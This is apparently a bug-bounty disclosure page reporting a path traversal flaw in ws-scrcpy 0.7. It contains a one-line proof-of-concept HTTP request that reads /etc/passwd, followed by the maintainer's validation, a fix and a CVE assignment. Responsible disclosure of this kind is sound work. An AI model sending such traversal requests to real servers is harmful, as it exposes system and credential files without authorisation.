External Control of File Name or Path in netristv/ws-scrcpy

Valid

Reported on

Dec 13th 2021


Description

read file From server

Proof of Concept

GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xxxx

Impact

test on ws-scrcpy-0.7๏ผŒthis is The latest version

We are processing your report and will contact the netristv/ws-scrcpy team within 24 hours. 2 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
Sergey Volkov
a month ago

Maintainer


@whoamisky Thank you for the report.

This method is only used to read the configuration file. User (admin/service owner) should pass path to the file in WS_SCRCPY_CONFIG environment variable. The content of the file is not avalivale to end users over HTTP.

Sergey Volkov has invalidated this vulnerability a month ago

See comment.

The disclosure bounty has been dropped
The fix bounty has been dropped
Sergey Volkov
a month ago

Maintainer


@admin Can we please reopen this report and change its status?

Jamie Slome
a month ago

Admin


@drauggres - sure, we can arrange that for you!

Would you like me to change it back to pending so that you can re-mark it as valid?

Sergey Volkov
a month ago

Maintainer


Yes please.

P.S. [Not related to this report] The link from email notification brought me to www.huntr.dev and I am not authorized there, but I still have the active session on huntr.dev (maybe you have some problem with cookie)

Jamie Slome
a month ago

Admin


Will get this sorted for you now!

With regards to the cookie issue, I have created a bug ticket internally, and we will investigate the problem shortly! Thank you for letting us know โ™ฅ๏ธ

Jamie Slome
a month ago

Admin


For reference, I have now set the report back to pending as requested by @drauggres.

Thanks! ๐Ÿ™Œ

Sergey Volkov validated this vulnerability a month ago
whoamisky has been awarded the disclosure bounty
The fix bounty is now up for grabs
Sergey Volkov confirmed that a fix has been merged on e83cf6 a month ago
The fix bounty has been dropped
whoamisky
a month ago

Researcher


@admin you can give me a CVE ?

Jamie Slome
24 days ago

Admin


Before we assign a CVE, we just need to get confirmation from the maintainer that they are happy for us to create one (require maintainer confirmation when our system doesn't automatically assign and publish one).

@drauggres - are you happy for us to assign a CVE to this vulnerability report?

Sergey Volkov
24 days ago

Maintainer


I don't mind.

whoamisky
24 days ago

Researcher


@drauggres tks

Jamie Slome
24 days ago

Admin


CVE published! ๐ŸŽŠ